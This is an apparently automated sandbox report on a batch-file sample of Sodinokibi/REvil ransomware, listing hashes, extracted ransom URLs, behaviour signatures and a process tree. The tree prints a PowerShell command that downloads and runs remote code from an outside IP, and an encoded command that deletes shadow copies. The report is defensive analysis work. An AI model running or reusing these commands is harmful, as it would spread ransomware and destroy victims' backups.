Analysis
-
max time kernel
126s -
max time network
128s -
platform
windows10_x64 -
resource
win10 -
submitted
15-08-2020 22:10
Static task
static1
Behavioral task
behavioral1
Sample
df9ae1ee4f2b0aa1f7a2e70779f9dbd4.bat
Resource
win7v200722
Behavioral task
behavioral2
Sample
df9ae1ee4f2b0aa1f7a2e70779f9dbd4.bat
Resource
win10
General
-
Target
df9ae1ee4f2b0aa1f7a2e70779f9dbd4.bat
-
Size
222B
-
MD5
19b3b3791a8bb6e48fca9c29132a649e
-
SHA1
b03af91b377f63ab4d6c236a7f942643aa66498f
-
SHA256
4167595a02a41357a7cb611b831f74f802ce747c124913fefe76789babbf1c40
-
SHA512
f2e3d44f22f21c2a5d24013772ec273c510fc76ab32e6586125c22d968886198d2225138570153385fb94b06f0360e13a59fd7fe33fef2aa3c447e25554eac42
Malware Config
Extracted
http://185.103.242.78/pastes/df9ae1ee4f2b0aa1f7a2e70779f9dbd4
Extracted
C:\z795dq-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3FB5F5D0526F17E3
http://decryptor.cc/3FB5F5D0526F17E3
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 3228 powershell.exe -
Modifies extensions of user files 8 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File renamed C:\Users\Admin\Pictures\RestoreConnect.raw => \??\c:\users\admin\pictures\RestoreConnect.raw.z795dq powershell.exe File renamed C:\Users\Admin\Pictures\StartEdit.raw => \??\c:\users\admin\pictures\StartEdit.raw.z795dq powershell.exe File renamed C:\Users\Admin\Pictures\WriteClear.crw => \??\c:\users\admin\pictures\WriteClear.crw.z795dq powershell.exe File renamed C:\Users\Admin\Pictures\StopUndo.tif => \??\c:\users\admin\pictures\StopUndo.tif.z795dq powershell.exe File renamed C:\Users\Admin\Pictures\EnterConnect.crw => \??\c:\users\admin\pictures\EnterConnect.crw.z795dq powershell.exe File renamed C:\Users\Admin\Pictures\PushSet.png => \??\c:\users\admin\pictures\PushSet.png.z795dq powershell.exe File renamed C:\Users\Admin\Pictures\ReadUnlock.crw => \??\c:\users\admin\pictures\ReadUnlock.crw.z795dq powershell.exe File renamed C:\Users\Admin\Pictures\RemoveExpand.tif => \??\c:\users\admin\pictures\RemoveExpand.tif.z795dq powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\jhoe5uxgtk.bmp" powershell.exe -
Drops file in Program Files directory 13 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\CompressRestart.mpp powershell.exe File opened for modification \??\c:\program files\SwitchRepair.vb powershell.exe File opened for modification \??\c:\program files\UnregisterWatch.txt powershell.exe File created \??\c:\program files\z795dq-readme.txt powershell.exe File opened for modification \??\c:\program files\BackupUnregister.ADTS powershell.exe File opened for modification \??\c:\program files\ResolveUpdate.xlsb powershell.exe File opened for modification \??\c:\program files\StepPop.wvx powershell.exe File opened for modification \??\c:\program files\StopUninstall.tiff powershell.exe File opened for modification \??\c:\program files\SuspendDismount.xml powershell.exe File opened for modification \??\c:\program files\SwitchUnblock.dot powershell.exe File opened for modification \??\c:\program files\UseShow.wps powershell.exe File created \??\c:\program files (x86)\z795dq-readme.txt powershell.exe File opened for modification \??\c:\program files\NewEnable.xlsx powershell.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepid process 3228 powershell.exe 3228 powershell.exe 3228 powershell.exe 3228 powershell.exe 3228 powershell.exe 2696 powershell.exe 2696 powershell.exe 2696 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 3228 powershell.exe Token: SeDebugPrivilege 3228 powershell.exe Token: SeDebugPrivilege 2696 powershell.exe Token: SeBackupPrivilege 3904 vssvc.exe Token: SeRestorePrivilege 3904 vssvc.exe Token: SeAuditPrivilege 3904 vssvc.exe Token: SeTakeOwnershipPrivilege 3228 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 3832 wrote to memory of 3228 3832 cmd.exe powershell.exe PID 3832 wrote to memory of 3228 3832 cmd.exe powershell.exe PID 3832 wrote to memory of 3228 3832 cmd.exe powershell.exe PID 3228 wrote to memory of 2696 3228 powershell.exe powershell.exe PID 3228 wrote to memory of 2696 3228 powershell.exe powershell.exe PID 3228 wrote to memory of 2696 3228 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\df9ae1ee4f2b0aa1f7a2e70779f9dbd4.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3832 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/df9ae1ee4f2b0aa1f7a2e70779f9dbd4');Invoke-DWFHDKTAJZTPUIQ;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3228 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2696
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:3904